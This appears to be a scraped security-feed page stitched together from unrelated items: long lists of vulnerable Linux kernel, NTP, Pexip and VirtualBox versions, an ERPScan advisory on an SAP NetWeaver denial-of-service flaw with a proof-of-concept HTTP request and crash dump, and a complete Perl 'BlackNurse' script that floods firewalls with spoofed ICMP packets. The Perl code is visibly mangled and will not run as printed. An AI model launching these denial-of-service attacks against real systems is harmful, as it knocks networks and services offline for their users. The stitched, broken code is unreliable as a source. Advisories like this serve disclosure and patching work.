Denial

Vulnerable: Linux kernel 4.2.3
Linux kernel 4.1.4
Linux kernel 4.1.1
Linux kernel 4.0.6
Linux kernel 3.19.3
Linux kernel 3.18.22
Linux kernel 3.18.17
Linux kernel 3.18.11
Linux kernel 3.18.8
Linux kernel 3.18.7
Linux kernel 3.18.3
Linux kernel 3.18.2
Linux kernel 3.18.1
Linux kernel 3.17.4
Linux kernel 3.17.2
Linux kernel 3.16.7
Linux kernel 3.16.2
Linux kernel 3.16.1
Linux kernel 3.15.10
Linux kernel 3.15.5
Linux kernel 3.15.2
Linux kernel 3.14.54
Linux kernel 3.14.45
Linux kernel 3.14.37
Linux kernel 3.14.4
Linux kernel 3.14.3
Linux kernel 3.14.2
Linux kernel 3.13.11
Linux kernel 3.13.9
Linux kernel 3.13.3
Linux kernel 3.13.1
Linux kernel 3.12.49
Linux kernel 3.12.48
Linux kernel 3.12.44
Linux kernel 3.12.40
Linux kernel 3.12.21
Linux kernel 3.12.18
Linux kernel 3.12.17
Linux kernel 3.12.16
Linux kernel 3.12.11
Linux kernel 3.12.7
Linux kernel 3.12.4
Linux kernel 3.12.3
Linux kernel 3.12.2
Linux kernel 3.11.3
Linux kernel 3.10.90
Linux kernel 3.10.81
Linux kernel 3.10.73
Linux kernel 3.10.45
Linux kernel 3.10.41
Linux kernel 3.10.38
Linux kernel 3.10.37
Linux kernel 3.10.36
Linux kernel 3.10.30
Linux kernel 3.10.27
Linux kernel 3.10.26
Linux kernel 3.10.23
Linux kernel 3.10.22
Linux kernel 3.10.21
Linux kernel 3.10.14
Linux kernel 3.10.10
Linux kernel 3.10.9
Linux kernel 3.10.7
Linux kernel 3.8.9
Linux kernel 3.8.6
Linux kernel 3.8.5
Linux kernel 3.8.4
Linux kernel 3.8.2
Linux kernel 3.8.1
Linux kernel 3.7.10
Linux kernel 3.7.9
Linux kernel 3.7.8
Linux kernel 3.7.7
Linux kernel 3.7.5
Linux kernel 3.7.4
Linux kernel 3.7.3
Linux kernel 3.7.2
Linux kernel 3.7.1
Linux kernel 3.6.11
Linux kernel 3.6.10
Linux kernel 3.6.9
Linux kernel 3.6.8
Linux kernel 3.6.7
Linux kernel 3.6.6
Linux kernel 3.6.5
Linux kernel 3.6.4
Linux kernel 3.6.3
Linux kernel 3.6.2
Linux kernel 3.6.1
Linux kernel 3.5.7
Linux kernel 3.5.6
Linux kernel 3.5.5
Linux kernel 3.5.4
Linux kernel 3.5.3
Linux kernel 3.5.2
Linux kernel 3.5.1
Linux kernel 3.4.88
Linux kernel 3.4.87
Linux kernel 3.4.86
Linux kernel 3.4.80
Linux kernel 3.4.76
Linux kernel 3.4.73
Linux kernel 3.4.72
Linux kernel 3.4.71
Linux kernel 3.4.64
Linux kernel 3.4.58
Linux kernel 3.4.42
Linux kernel 3.4.36
Linux kernel 3.4.32
Linux kernel 3.4.31
Linux kernel 3.4.27
Linux kernel 3.4.26
Linux kernel 3.4.25
Linux kernel 3.4.21
Linux kernel 3.4.20
Linux kernel 3.4.19
Linux kernel 3.4.18
Linux kernel 3.4.17
Linux kernel 3.4.16
Linux kernel 3.4.15
Linux kernel 3.4.14
Linux kernel 3.4.13
Linux kernel 3.4.12
Linux kernel 3.4.11
Linux kernel 3.4.10
Linux kernel 3.4.9
Linux kernel 3.4.8
Linux kernel 3.4.7
Linux kernel 3.4.6
Linux kernel 3.4.5
Linux kernel 3.4.4
Linux kernel 3.4.3
Linux kernel 3.4.2
Linux kernel 3.4.1
Linux kernel 3.3.5
Linux kernel 3.3.4
Linux kernel 3.3.2
Linux kernel 3.2.82
Linux kernel 3.2.72
Linux kernel 3.2.62
Linux kernel 3.2.57
Linux kernel 3.2.56
Linux kernel 3.2.51
Linux kernel 3.2.24
Linux kernel 3.2.23
Linux kernel 3.2.13
Linux kernel 3.2.12
Linux kernel 3.2.9
Linux kernel 3.2.1
Linux kernel 3.1.8
Linux kernel 3.0.98
Linux kernel 3.0.75
Linux kernel 3.0.72
Linux kernel 3.0.69
Linux kernel 3.0.65
Linux kernel 3.0.60
Linux kernel 3.0.59
Linux kernel 3.0.58
Linux kernel 3.0.37
Linux kernel 3.0.34
Linux kernel 3.0.5
Linux kernel 3.0.4
Linux kernel 3.0.2
Linux kernel 3.0.1
Linux kernel 2.6.39
Linux kernel 2.6.38
Linux kernel 2.6.37
Linux kernel 2.6.36
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.33 .1
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 13
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31
Linux kernel 2.6.30 .10
Linux kernel 2.6.30 .1
Linux kernel 2.6.30
Linux kernel 2.6.29 .4
Linux kernel 2.6.29 .1
Linux kernel 2.6.29
Linux kernel 2.6.28 .9
Linux kernel 2.6.28 .8
Linux kernel 2.6.28 .6
Linux kernel 2.6.28 .5
Linux kernel 2.6.28 .3
Linux kernel 2.6.28 .2
Linux kernel 2.6.28 .1
Linux kernel 2.6.28
Linux kernel 2.6.27 6
Linux kernel 2.6.27 3
Linux kernel 2.6.27 12
Linux kernel 2.6.27 .8
Linux kernel 2.6.27 .5
Linux kernel 2.6.27 .46
Linux kernel 2.6.27 .24
Linux kernel 2.6.27 .14
Linux kernel 2.6.27 .13
Linux kernel 2.6.27 .12
Linux kernel 2.6.27
Linux kernel 2.6.26 7
Linux kernel 2.6.26 .6
Linux kernel 2.6.26 .4
Linux kernel 2.6.26 .3
Linux kernel 2.6.26
Linux kernel 2.6.25 19
Linux kernel 2.6.25 .9
Linux kernel 2.6.25 .8
Linux kernel 2.6.25 .7
Linux kernel 2.6.25 .6
Linux kernel 2.6.25 .5
Linux kernel 2.6.25 .15
Linux kernel 2.6.25 .13
Linux kernel 2.6.25 .12
Linux kernel 2.6.25 .11
Linux kernel 2.6.25 .10
Linux kernel 2.6.25
Linux kernel 2.6.24 .2
Linux kernel 2.6.24 .1
Linux kernel 2.6.24
Linux kernel 2.6.23 .7
Linux kernel 2.6.23 .6
Linux kernel 2.6.23 .5
Linux kernel 2.6.23 .4
Linux kernel 2.6.23 .3
Linux kernel 2.6.23 .2
Linux kernel 2.6.23
Linux kernel 2.6.22 .8
Linux kernel 2.6.22 .7
Linux kernel 2.6.22 .6
Linux kernel 2.6.22 .5
Linux kernel 2.6.22 .4
Linux kernel 2.6.22 .3
Linux kernel 2.6.22 .2
Linux kernel 2.6.22 .17
Linux kernel 2.6.22 .16
Linux kernel 2.6.22 .15
Linux kernel 2.6.22 .14
Linux kernel 2.6.22 .13
Linux kernel 2.6.22 .12
Linux kernel 2.6.22 .11
Linux kernel 2.6.22 .1
Linux kernel 2.6.22
Linux kernel 2.6.21 4
Linux kernel 2.6.21 .7
Linux kernel 2.6.21 .6
Linux kernel 2.6.21 .3
Linux kernel 2.6.21 .2
Linux kernel 2.6.21 .1
Linux kernel 2.6.21
Linux kernel 2.6.20 .9
Linux kernel 2.6.20 .8
Linux kernel 2.6.20 .7
Linux kernel 2.6.20 .6
Linux kernel 2.6.20 .5
Linux kernel 2.6.20 .4
Linux kernel 2.6.20 .15
Linux kernel 2.6.20 .14
Linux kernel 2.6.20 .12
Linux kernel 2.6.20 .10
Linux kernel 2.6.20 .1
Linux kernel 2.6.20
Linux kernel 2.6.19 .4
Linux kernel 2.6.19 .3
Linux kernel 2.6.19 .2
Linux kernel 2.6.19 .1
Linux kernel 2.6.19
Linux kernel 2.6.18 .8
Linux kernel 2.6.18 .7
Linux kernel 2.6.18 .6
Linux kernel 2.6.18 .5
Linux kernel 2.6.18 .4
Linux kernel 2.6.18 .3
Linux kernel 2.6.18 .2
Linux kernel 2.6.18 .1
Linux kernel 2.6.17 .9
Linux kernel 2.6.17 .8
Linux kernel 2.6.17 .7
Linux kernel 2.6.17 .6
Linux kernel 2.6.17 .5
Linux kernel 2.6.17 .4
Linux kernel 2.6.17 .3
Linux kernel 2.6.17 .2
Linux kernel 2.6.17 .14
Linux kernel 2.6.17 .13
Linux kernel 2.6.17 .12
Linux kernel 2.6.17 .11
Linux kernel 2.6.17 .10
Linux kernel 2.6.17 .1
Linux kernel 2.6.17
Linux kernel 2.6.16 27
Linux kernel 2.6.16 13
Linux kernel 2.6.16 .9
Linux kernel 2.6.16 .8
Linux kernel 2.6.16 .7
Linux kernel 2.6.16 .6
Linux kernel 2.6.16 .53
Linux kernel 2.6.16 .52
Linux kernel 2.6.16 .51
Linux kernel 2.6.16 .50
Linux kernel 2.6.16 .5
Linux kernel 2.6.16 .49
Linux kernel 2.6.16 .48
Linux kernel 2.6.16 .47
Linux kernel 2.6.16 .46
Linux kernel 2.6.16 .45
Linux kernel 2.6.16 .44
Linux kernel 2.6.16 .43
Linux kernel 2.6.16 .41
Linux kernel 2.6.16 .40
Linux kernel 2.6.16 .4
Linux kernel 2.6.16 .39
Linux kernel 2.6.16 .38
Linux kernel 2.6.16 .37
Linux kernel 2.6.16 .36
Linux kernel 2.6.16 .35
Linux kernel 2.6.16 .34
Linux kernel 2.6.16 .33
Linux kernel 2.6.16 .32
Linux kernel 2.6.16 .31
Linux kernel 2.6.16 .30
Linux kernel 2.6.16 .3
Linux kernel 2.6.16 .29
Linux kernel 2.6.16 .28
Linux kernel 2.6.16 .27
Linux kernel 2.6.16 .26
Linux kernel 2.6.16 .25
Linux kernel 2.6.16 .24
Linux kernel 2.6.16 .23
Linux kernel 2.6.16 .22
Linux kernel 2.6.16 .21
Linux kernel 2.6.16 .20
Linux kernel 2.6.16 .2
Linux kernel 2.6.16 .19
Linux kernel 2.6.16 .18
Linux kernel 2.6.16 .17
Linux kernel 2.6.16 .16
Linux kernel 2.6.16 .15
Linux kernel 2.6.16 .14
Linux kernel 2.6.16 .12
Linux kernel 2.6.16 .11
Linux kernel 2.6.16 .10
Linux kernel 2.6.16 .1
Linux kernel 2.6.16
Linux kernel 2.6.15 .7
Linux kernel 2.6.15 .6
Linux kernel 2.6.15 .4
Linux kernel 2.6.15 .3
Linux kernel 2.6.15 .2
Linux kernel 2.6.15 .1
Linux kernel 2.6.15
Linux kernel 2.6.14 .7
Linux kernel 2.6.14 .6
Linux kernel 2.6.14 .5
Linux kernel 2.6.14 .4
Linux kernel 2.6.14 .3
Linux kernel 2.6.14 .2
Linux kernel 2.6.14 .1
Linux kernel 2.6.14
Linux kernel 2.6.13 .5
Linux kernel 2.6.13 .4
Linux kernel 2.6.13 .3
Linux kernel 2.6.13 .2
Linux kernel 2.6.13 .1
Linux kernel 2.6.13
Linux kernel 2.6.12 .6
Linux kernel 2.6.12 .5
Linux kernel 2.6.12 .4
Linux kernel 2.6.12 .3
Linux kernel 2.6.12 .22
Linux kernel 2.6.12 .2
Linux kernel 2.6.12 .12
Linux kernel 2.6.12 .1
Linux kernel 2.6.12
Linux kernel 2.6.11 .9
Linux kernel 2.6.11 .8
Linux kernel 2.6.11 .7
Linux kernel 2.6.11 .6
Linux kernel 2.6.11 .5
Linux kernel 2.6.11 .4
Linux kernel 2.6.11 .3
Linux kernel 2.6.11 .2
Linux kernel 2.6.11 .12
Linux kernel 2.6.11 .11
Linux kernel 2.6.11 .10
Linux kernel 2.6.11 .1
Linux kernel 2.6.11
Linux kernel 2.6.10
Linux kernel 2.6.9
Linux kernel 2.6.8
Linux kernel 2.6.7
Linux kernel 2.6.6
Linux kernel 2.6.5
Linux kernel 2.6.4
Linux kernel 2.6.3
Linux kernel 2.6.2
Linux kernel 2.6.1
Linux kernel 2.6 .10
Linux kernel 2.6
Linux kernel 4.4
Linux kernel 4.3.3
Linux kernel 4.3-rc1
Linux kernel 4.2.8
Linux kernel 4.2
Linux kernel 4.1.15
Linux kernel 4.1-rc7
Linux kernel 4.1-rc6
Linux kernel 4.1-rc3
Linux kernel 4.1-rc1
Linux kernel 4.1
Linux kernel 4.0.5
Linux kernel 4.0
Linux kernel 3.9.8
Linux kernel 3.9.4
Linux kernel 3.9
Linux kernel 3.8
Linux kernel 3.7.6
Linux kernel 3.7
Linux kernel 3.6
Linux kernel 3.5
Linux kernel 3.4.93
Linux kernel 3.4.81
Linux kernel 3.4.70
Linux kernel 3.4.67
Linux kernel 3.4.29
Linux kernel 3.4
Linux kernel 3.3
Linux kernel 3.2.81
Linux kernel 3.2.78
Linux kernel 3.2.65
Linux kernel 3.2.64
Linux kernel 3.2.63-2
Linux kernel 3.2.63
Linux kernel 3.2.60
Linux kernel 3.2.55
Linux kernel 3.2.54
Linux kernel 3.2.53
Linux kernel 3.2.52
Linux kernel 3.2.50
Linux kernel 3.2.44
Linux kernel 3.2.42
Linux kernel 3.2.38
Linux kernel 3.2.2
Linux kernel 3.2
Linux kernel 3.19
Linux kernel 3.18.9
Linux kernel 3.18
Linux kernel 3.17.6
Linux kernel 3.17
Linux kernel 3.16.6
Linux kernel 3.16.36
Linux kernel 3.16
Linux kernel 3.15
Linux kernel 3.14.73
Linux kernel 3.14.7
Linux kernel 3.14.5
Linux kernel 3.14-4
Linux kernel 3.14-1
Linux kernel 3.14
Linux kernel 3.13.7
Linux kernel 3.13.6
Linux kernel 3.13.5
Linux kernel 3.13.4
Linux kernel 3.13
Linux kernel 3.12.22
Linux kernel 3.12.15
Linux kernel 3.12.14
Linux kernel 3.12.12
Linux kernel 3.12.1
Linux kernel 3.12
Linux kernel 3.11.9
Linux kernel 3.11.6
Linux kernel 3.11
Linux kernel 3.10.5
Linux kernel 3.10.43
Linux kernel 3.10.31
Linux kernel 3.10.20
Linux kernel 3.10.17
Linux kernel 3.10
Linux kernel 3.1
Linux kernel 3.0.66
Linux kernel 3.0.62
Linux kernel 3.0.18
Linux kernel 3.0
Linux kernel 2.6.8.1
Linux kernel 2.6.38.6
Linux kernel 2.6.38.4
Linux kernel 2.6.38.3
Linux kernel 2.6.38.2
Linux kernel 2.6.37.2
Linux kernel 2.6.35.5
Linux kernel 2.6.35.4
Linux kernel 2.6.35.13
Linux kernel 2.6.35.1
Linux kernel 2.6.34.3
Linux kernel 2.6.34.2
Linux kernel 2.6.34.14
Linux kernel 2.6.34.13
Linux kernel 2.6.34.1
Linux kernel 2.6.33.7
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.62
Linux kernel 2.6.32.61
Linux kernel 2.6.32.60
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.4
Linux kernel 2.6.32.3
Linux kernel 2.6.32.28
Linux kernel 2.6.32.22
Linux kernel 2.6.32.2
Linux kernel 2.6.32.18
Linux kernel 2.6.32.17
Linux kernel 2.6.32.16
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3
Linux kernel 2.6.28.4
Linux kernel 2.6.28.10
Linux kernel 2.6.27.54
Linux kernel 2.6.27.51
Linux kernel 2.6.27.49
Linux kernel 2.6.27.26
Linux kernel 2.6.26.1
Linux kernel 2.6.25.4
Linux kernel 2.6.25.3
Linux kernel 2.6.25.2
Linux kernel 2.6.25.1
Linux kernel 2.6.24.6
Linux kernel 2.6.24.4
Linux kernel 2.6.24.3
Linux kernel 2.6.23.14
Linux kernel 2.6.23.10
Linux kernel 2.6.23.1
Linux kernel 2.6.23.09
Linux kernel 2.6.20.3
Linux kernel 2.6.20.2
Linux kernel 2.6.20.13
Linux kernel 2.6.20.11
Linux kernel 2.6.20-2
Linux kernel 2.6.18.1
Linux kernel 2.6.18-53
Linux kernel 2.6.18
Linux kernel 2.6.16.9
Linux kernel 2.6.16.7
Linux kernel 2.6.16.19
Linux kernel 2.6.16.13
Linux kernel 2.6.16.12
Linux kernel 2.6.16.11
Linux kernel 2.6.15.5
Linux kernel 2.6.15.4
Linux kernel 2.6.15.11
Linux kernel 2.6.14.3
Linux kernel 2.6.14.2
Linux kernel 2.6.14.1
Linux kernel 2.6.13.4
Linux kernel 2.6.13.3
Linux kernel 2.6.13.2
Linux kernel 2.6.13.1
Linux kernel 2.6.12.6
Linux kernel 2.6.12.5
Linux kernel 2.6.12.4
Linux kernel 2.6.12.3
Linux kernel 2.6.12.2
Linux kernel 2.6.12.1
Linux kernel 2.6.11.8
Linux kernel 2.6.11.7
Linux kernel 2.6.11.6
Linux kernel 2.6.11.5
Linux kernel 2.6.11.4
Linux kernel 2.6.11.12
Linux kernel 2.6.11.11


SecurityFocus Vulnerabilities

Application: SAP NetWeaver AS JAVA

Versions Affected: SAP NetWeaver AS JAVA 7.4

Vendor URL: http://SAP.com

Bug: Denial of Service

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

Reference: SAP Security Note 2313835

Author: Vahagn Vardanyan (ERPScan)

Description

1. ADVISORY INFORMATION

Title: [ERPSCAN-16-033] SAP NetWeaver AS JAVA icman a DoS vulnerability

Advisory ID:[ERPSCAN-16-033]

Risk: high

Advisory URL: https://erpscan.com/advisories/erpscan-16-033-sap-netweaver-java-icman-dos-vulnerability/

Date published: 11.11.2016

Vendors contacted: SAP

2. VULNERABILITY INFORMATION

Class: Denial of Service

Impact: Denial of Service

Remotely Exploitable: yes

Locally Exploitable: yes

CVSS Information

CVSS Base Score v3: 7.5 / 10

CVSS Base Vector:

AV : Attack Vector (Related exploit range) Network (N)

AC : Attack Complexity (Required attack complexity) Low (L)

PR : Privileges Required (Level of privileges needed to exploit) None (N)

UI : User Interaction (Required user participation) None (N)

S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Unchanged (U)

C : Impact to Confidentiality None (N)

I : Impact to Integrity None (N)

A : Impact to Availability High (H)

3. VULNERABILITY DESCRIPTION

Unauthenticated attacker can make DoS attack with use P4 over HTTPS

4. VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT

SAP KERNEL 7.21 32-BIT UNICODE

SAP KERNEL 7.21 64-BIT

SAP KERNEL 7.21 64-BIT UNICODE

SAP KERNEL 7.21 EXT 32-BIT

SAP KERNEL 7.21 EXT 32-BIT UC

SAP KERNEL 7.21 EXT 64-BIT

SAP KERNEL 7.21 EXT 64-BIT UC

SAP KERNEL 7.22 64-BIT

SAP KERNEL 7.22 64-BIT UNICODE

SAP KERNEL 7.22 EXT 64-BIT

SAP KERNEL 7.22 EXT 64-BIT UC

SAP KERNEL 7.42 64-BIT

SAP KERNEL 7.42 64-BIT UNICODE

SAP KERNEL 7.45 64-BIT

SAP KERNEL 7.45 64-BIT UNICODE

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2313835

6. AUTHOR

Vahagn Vardanyan (ERPScan)

7. TECHNICAL DESCRIPTION

Vulnerability triggers when one sends HTTPS GET request to SAP NetWeaver P4.

PoC

```

GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1

Host: 172.16.10.65:50005

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0)
Gecko/20100101 Firefox/33.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

```

```

0:007> r

rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0

rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000

rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40

r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20

r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000

r14=0000000000000000 r15=0000000000000001

iopl=0 nv up ei ng nz ac po cy

cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297

icman!P4PlugInReadHandler+0xb9:

00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4]
ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9
[d:\depot\bas2_rel\src\krn\si\ic\p4_plg.c @ 1192]

00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 5088]

00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 4808]

00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6
[d:\depot\bas2_rel\src\krn\si\ic\icxxmplx.c @ 3840]

00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43

00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf

00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd

00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

```

8. REPORT TIMELINE

Sent: 22.04.2016

Reported: 23.04.2016

Vendor response: 23.04.2016

Date of Public Advisory: 09.08.2016

9. REFERENCES

[ERPSCAN-16-033] SAP NetWeaver AS JAVA icman – DoS vulnerability

10. ABOUT ERPScan Research

ERPScan research team specializes in vulnerability research and
analysis of critical enterprise applications. It was acknowledged
multiple times by the largest software vendors like SAP, Oracle,
Microsoft, IBM, VMware, HP for discovering more than 400
vulnerabilities in their solutions (200 of them just in SAP!).

ERPScan researchers are proud of discovering new types of
vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The
Best Server-Side Bug" nomination at BlackHat 2013.

ERPScan experts participated as speakers, presenters, and trainers at
60+ prime international security conferences in 25+ countries across
the continents ( e.g. BlackHat, RSA, HITB) and conducted private
trainings for several Fortune 2000 companies.

ERPScan researchers carry out the EAS-SEC project that is focused on
enterprise application security awareness by issuing annual SAP
security researches.

ERPScan experts were interviewed in specialized infosec resources and
featured in major media worldwide. Among them, there are Reuters,
Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,
Chinabyte, etc.

Our team consists of highly-qualified researchers, specialized in
various fields of cybersecurity (from web application to ICS/SCADA
systems), gathering their experience to conduct the best SAP security
research.

11. ABOUT ERPScan

ERPScan is the most respected and credible Business Application
Cybersecurity provider. Founded in 2010, the company operates globally
and enables large Oil and Gas, Financial, Retail and other
organizations to secure their mission-critical processes. Named as an
aEmerging Vendora in Security by CRN, listed among aTOP 100 SAP
Solution providersa and distinguished by 30+ other awards, ERPScan is
the leading SAP SE partner in discovering and resolving security
vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to
assist in improving the security of their latest solutions.

ERPScanas primary mission is to close the gap between technical and
business security and provide solutions for CISO's to evaluate and
secure SAP and Oracle ERP systems and business-critical applications
from both cyberattacks and internal fraud. As a rule, our clients are
large enterprises, Fortune 2000 companies and MSPs, whose requirements
are to actively monitor and manage security of vast SAP and Oracle
landscapes on a global scale.

We afollow the suna and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.

Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301

Phone: 650.798.5255

Twitter: @erpscan

Scoop-it: Business Application Security


Exploit Files ≈ Packet Storm

Bugtraq ID: 94455 Class: Failure to Handle Exceptional Conditions CVE: CVE-2016-7433 Remote: No Local: Yes Published: Nov 21 2016 12:00AM Updated: Nov 22 2016 12:12AM Credit: Brian Utterback of Oracle, and Sharon Goldberg and Aanchal Malhotra of Boston University. Vulnerable: NTP NTP 4.3.90
NTP NTP 4.2.8
NTP NTP 4.1.2
NTP NTP 4.3.93
NTP NTP 4.3.92
NTP NTP 4.2.8p8
NTP NTP 4.2.8p7
NTP NTP 4.2.8p6
NTP NTP 4.2.8p5
NTP NTP 4.2.8p4
NTP NTP 4.2.8p3-RC1
NTP NTP 4.2.8p3
NTP NTP 4.2.8p2
NTP NTP 4.2.8p1
NTP NTP 4.2.7p385 Not Vulnerable: NTP NTP 4.3.94
NTP NTP 4.2.8p9


SecurityFocus Vulnerabilities

 #!/usr/bin/perl
#
# Cisco ASA 5515/5525/5550/5515-X | Fotinet |
# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N |
# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial
# of service to well known firewalls. Most ICMP attacks that we see are based
# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based
# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP
# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly
# effective even at low bandwidth. Low bandwidth is in this case around 15-18
# Mbit/s. This is to achieve the volume of packets needed which is around 40 to
# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet
# connection. The impact we see on different firewalls is typically high CPU
# loads. When an attack is ongoing, users from the LAN side will no longer be
# able to send/receive traffic to/from the Internet. All firewalls we have seen
# recover when the attack stops.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational
# purpose ONLY!
#
# Thanks to Maya (Maiya|Mia) Hristova and all my friends
# that support me.
#
#

use Net::RawIP;

print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n";
print "[ ======\n";
print "[ Usg: $ 0 <spoofed address> <target>\n";
print "[ Example: perl $ 0 133.71.33.7 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $ spoof = $ ARGV[0];
my $ target = $ ARGV[1];

my $ sock = new Net::RawIP( icmp => { }) or die;

print "[ Sending crafted packets..\n";
while ()
$ sock->set({ ip => { saddr => $ spoof, daddr => $ target,
icmp => type => 3, code => 3 });
$ sock->send;
$ sock->set( icmp => { type=>3, code => 0});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 1});
$ sock->send;
$ sock->set( icmp => { type=>3, code => 2});
$ sock->send;
}


Exploit Files ≈ Packet Storm

Bugtraq ID: 93150 Class: Failure to Handle Exceptional Conditions CVE: CVE-2016-6304 Remote: Yes Local: No Published: Sep 23 2016 12:00AM Updated: Nov 15 2016 12:05AM Credit: Shi Lei (Gear Team, Qihoo 360 Inc.) Vulnerable: Pexip Pexip Infinity 9.1
Pexip Pexip Infinity 9
Pexip Pexip Infinity 8.1
Pexip Pexip Infinity 8
Pexip Pexip Infinity 7
Pexip Pexip Infinity 6
Pexip Pexip Infinity 5
Pexip Pexip Infinity 4
Pexip Pexip Infinity 12.2
Pexip Pexip Infinity 12.1
Pexip Pexip Infinity 12
Pexip Pexip Infinity 11.1
Pexip Pexip Infinity 11
Pexip Pexip Infinity 10.2
Pexip Pexip Infinity 10.1
Pexip Pexip Infinity 10
Oracle VM VirtualBox 5.0.26
Oracle VM VirtualBox 5.0.22
Oracle VM VirtualBox 5.0.16
Oracle VM VirtualBox 5.0.14
Oracle VM VirtualBox 5.0.13
Oracle VM VirtualBox 5.0.12
Oracle VM VirtualBox 5.0.11
Oracle VM VirtualBox 5.0.10
Oracle VM VirtualBox 5.0.9
Oracle VM VirtualBox 5.0.8
Oracle VM VirtualBox 4.3.36
Oracle VM VirtualBox 4.3.35
Oracle VM VirtualBox 4.3.34
Oracle VM VirtualBox 4.3.33
Oracle VM VirtualBox 4.3.32
Oracle VM VirtualBox 4.3.26
Oracle VM VirtualBox 4.3.19
Oracle VM VirtualBox 4.3.18
Oracle VM VirtualBox 4.3.17
Oracle VM VirtualBox 4.3.16
Oracle VM VirtualBox 4.3.15
Oracle VM VirtualBox 4.3.14
Oracle VM VirtualBox 4.3.12
Oracle VM VirtualBox 4.3.10
Oracle VM VirtualBox 4.3.9
Oracle VM VirtualBox 4.3.8
Oracle VM VirtualBox 4.3.7
Oracle VM VirtualBox 4.3.5
Oracle VM VirtualBox 4.2.36
Oracle VM VirtualBox 4.2.35
Oracle VM VirtualBox 4.2.34
Oracle VM VirtualBox 4.2.30
Oracle VM VirtualBox 4.2.27
Oracle VM VirtualBox 4.2.26
Oracle VM VirtualBox 4.2.24
Oracle VM VirtualBox 4.2.23
Oracle VM VirtualBox 4.2.19
Oracle VM VirtualBox 4.2.18
Oracle VM VirtualBox 4.2.14
Oracle VM VirtualBox 4.2.12
Oracle VM VirtualBox 4.2
Oracle VM VirtualBox 4.1.44
Oracle VM VirtualBox 4.1.43
Oracle VM VirtualBox 4.1.42
Oracle VM VirtualBox 4.1.38
Oracle VM VirtualBox 4.1.35
Oracle VM VirtualBox 4.1.34
Oracle VM VirtualBox 4.1.32
Oracle VM VirtualBox 4.1.31
Oracle VM VirtualBox 4.1.29
Oracle VM VirtualBox 4.1.28
Oracle VM VirtualBox 4.1.24
Oracle VM VirtualBox 4.1.22
Oracle VM VirtualBox 4.1.20
Oracle VM VirtualBox 4.1.18
Oracle VM VirtualBox 4.1.16
Oracle VM VirtualBox 4.1.14
Oracle VM VirtualBox 4.1.10
